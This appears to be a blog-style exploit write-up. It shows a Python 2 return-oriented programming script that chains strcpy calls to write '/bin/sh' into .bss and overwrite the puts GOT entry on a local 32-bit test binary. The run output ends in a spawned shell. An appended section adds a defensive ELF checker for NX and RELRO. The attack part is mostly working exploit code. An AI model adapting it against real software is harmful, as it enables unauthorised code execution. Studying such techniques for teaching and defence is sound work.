Hacking Arts
[intel][x86] ROP
```python
#!/usr/bin/env python
#
#
# ROP + GOT overwrite
#
# (Python 2 script: the payload is built as a str, so packed addresses
#  are concatenated directly and written with print)
#
import struct

p  = lambda x : struct.pack("<l", x)        # int -> 4-byte little-endian
up = lambda x : struct.unpack("<L", x)[0]   # 4-byte little-endian -> int (unused)

# var
strcpy   = p(0x08048374)                    # strcpy@plt
puts_got = [p(0x804975c), p(0x804975d), p(0x804975e), p(0x804975f)]   # GOT entry of puts, one address per byte
puts_plt = p(0x8048394)                     # puts@plt
ppr      = p(0x8048588)                     # pop; pop; ret gadget (clears the two strcpy arguments)
bbs      = [p(0x08049774), p(0x08049775), p(0x08049776), p(0x08049778),
            p(0x08049779), p(0x0804977a), p(0x0804977b)]             # .bss destination, one address per fragment
hex_00 = p(0x0804976c)                      # addresses of the single bytes 0x00, 0x1d, 0xb7, 0xe0 in the binary
hex_1d = p(0x0804976e)
hex_b7 = p(0x08049770)
hex_e0 = p(0x08049772)
str_slash = p(0x08048134)                   # addresses of "/", "b", "in", "s", "h" and "" in the binary
str_b     = p(0x08048137)
str_in    = p(0x0804813d)
str_s     = p(0x08048142)
str_h     = p(0x0804835a)
str_null  = p(0x0804833a)

# dummy
payload = ""
payload += "A" * 272

# stage - 1 strcpy(bbs,"/bin/sh")  : one strcpy(dst, src) call per fragment
for dst, src in zip(bbs, [str_slash, str_b, str_in, str_slash, str_s, str_h, str_null]):
    payload += strcpy + ppr + dst + src

# stage - 1 GOT overwrite ( got_puts ) : one strcpy per byte of the new address
for dst, src in zip(puts_got, [hex_e0, hex_b7, hex_1d, hex_00]):
    payload += strcpy + ppr + dst + src

# stage - 0 : call puts@plt (now pointing at the overwritten GOT entry) with bbs as its argument
payload += puts_plt
payload += "B" * 4
payload += bbs[0]

print (payload)
```
The ROP environment is Fedora release 12 with a 2.6 kernel.
ASLR was turned off first (done with ulimit -s unlimited); the protections that remained in place were NX and ASCII armor.
The payload uses ROP and a GOT overwrite together.
./vuln `python vuln.py`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAt
t4t
u7t
v=t
x4t
yBt
zZt
{:t
\rt
]pt
^nt
_lBBBBt
sh-4.0$
This is what the run looks like.
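As an added defender-side check (not part of the original post or its vuln binary), the script below parses an ELF's program headers and dynamic section and reports the two mitigations that matter for this attack: NX from PT_GNU_STACK, and RELRO from PT_GNU_RELRO plus BIND_NOW, since under full RELRO the GOT is mapped read-only and the strcpy-based GOT overwrite above would fault. The ELF images it tests are constructed in memory (header and program headers only, no code) and are hypothetical.

```python
import struct

PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO, PF_X = 2, 0x6474e551, 0x6474e552, 1
DT_NULL, DT_BIND_NOW, DT_FLAGS, DF_BIND_NOW = 0, 24, 30, 0x8

def elf_hardening(data):
    """Report NX and RELRO status of an ELF32/ELF64 image given as bytes."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64, end = data[4] == 2, ("<" if data[5] == 1 else ">")
    hdr_fmt, hdr_off, ph_fmt = ((end + "Q14xHH", 0x20, end + "IIQQQQQQ") if is64
                                else (end + "I10xHH", 0x1c, end + "IIIIIIII"))
    e_phoff, e_phentsize, e_phnum = struct.unpack_from(hdr_fmt, data, hdr_off)
    nx, relro, dynamic = False, "none", None          # no PT_GNU_STACK => executable stack
    for i in range(e_phnum):
        f = struct.unpack_from(ph_fmt, data, e_phoff + i * e_phentsize)
        p_type, p_flags, p_offset, p_filesz = (f[0], f[1], f[2], f[5]) if is64 else (f[0], f[6], f[1], f[4])
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = "partial"   # .got read-only after relocation, but lazy binding leaves .got.plt writable
        elif p_type == PT_DYNAMIC:
            dynamic = (p_offset, p_filesz)
    if relro == "partial" and dynamic:
        dyn_fmt = end + ("qQ" if is64 else "iI")
        for off in range(dynamic[0], dynamic[0] + dynamic[1], struct.calcsize(dyn_fmt)):
            d_tag, d_val = struct.unpack_from(dyn_fmt, data, off)
            if d_tag == DT_NULL:
                break
            if d_tag == DT_BIND_NOW or (d_tag == DT_FLAGS and d_val & DF_BIND_NOW):
                relro = "full"  # BIND_NOW: every GOT slot resolved at load, then the whole GOT is read-only
    return {"nx": nx, "relro": relro}

def build_elf32(phdrs, dynamic=b""):
    """Constructed test image (hypothetical): ELF32 header + program headers + dynamic blob, no code."""
    ehdr_size, phentsize = 52, 32
    dyn_off = ehdr_size + phentsize * len(phdrs)
    ehdr = b"\x7fELF\x01\x01\x01" + bytes(9)          # ELFCLASS32, little-endian, EV_CURRENT
    ehdr += struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, ehdr_size, 0, 0,
                        ehdr_size, phentsize, len(phdrs), 40, 0, 0)
    phdr_bytes = b"".join(struct.pack("<IIIIIIII", t, dyn_off, 0, 0, len(dynamic), len(dynamic), fl, 4)
                          for t, fl in phdrs)
    return ehdr + phdr_bytes + dynamic

DYN_LAZY = struct.pack("<iI", DT_NULL, 0)                                   # no BIND_NOW: lazy PLT binding
DYN_NOW = struct.pack("<iI", DT_BIND_NOW, 0) + DYN_LAZY
WEAK = build_elf32([(PT_GNU_STACK, 7), (PT_DYNAMIC, 6)], DYN_LAZY)         # RWX stack, no RELRO
HARDENED = build_elf32([(PT_GNU_STACK, 6), (PT_GNU_RELRO, 4), (PT_DYNAMIC, 6)], DYN_NOW)
if __name__ == "__main__":
    print(elf_hardening(WEAK), elf_hardening(HARDENED))
```

Run it on a real binary with `elf_hardening(open(path, "rb").read())`; a result of `relro: "full"` means the GOT entry of puts is no longer a writable target after load.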